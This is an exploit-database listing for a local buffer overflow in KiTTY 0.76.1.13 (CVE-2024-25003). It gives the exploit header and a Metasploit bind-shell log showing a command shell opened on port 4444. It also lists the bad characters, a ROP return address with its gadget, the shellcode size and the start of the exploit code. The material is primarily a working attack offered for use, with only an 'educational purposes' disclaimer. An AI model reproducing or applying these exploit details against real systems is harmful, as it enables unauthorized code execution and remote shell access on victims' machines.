Exploits / Vulnerability Discovered : 2024-03-14 |
Type : local |
Platform : windows
This exploit / vulnerability Kitty 0.76.1.13 start duplicated session hostname buffer overflow is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Hostname' Buffer Overflow
# Exploit Author: DEFCESCO (Austin A. DeFrancesco)
# Vendor Homepage: https://github.com/cyd01/KiTTY/=
# Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip
# Version: ≤ 0.76.1.13
# Tested on: Microsoft Windows 11/10/8/7/XP
# CVE: 2024-25003
#-------------------------------------------------------------------------------------#
# Blog: https://blog.DEFCESCO.io/Hell0+KiTTY
#-------------------------------------------------------------------------------------#
# msf6 payload(windows/shell_bind_tcp) > to_handler #
# [*] Payload Handler Started as Job 1 #
# msf6 payload(windows/shell_bind_tcp) > #
# [*] Started bind TCP handler against 192.168.100.28:4444 #
# [*] Command shell session 1 opened (192.168.100.119:39315 -> 192.168.100.28:4444) #
#-------------------------------------------------------------------------------------#
#----------------------------------------------------------------------------------#
# Badchars: \x00\x07\x0a\x0d\x1b\x9c\x3A\x40 #
# Return Address Information: 0x0052033c : {pivot 332 / 0x14c} : #
# ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN #
# ** [kitty.exe] ** | startnull,ascii {PAGE_EXECUTE_READWRITE} #
# Shellcode size at ESP: 1052 #
#----------------------------------------------------------------------------------#
return_address = struct.pack('<I', 0x0052033c) # ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [kitty.exe] ** | startnull,ascii {PAGE_EXECUTE_READWRITE}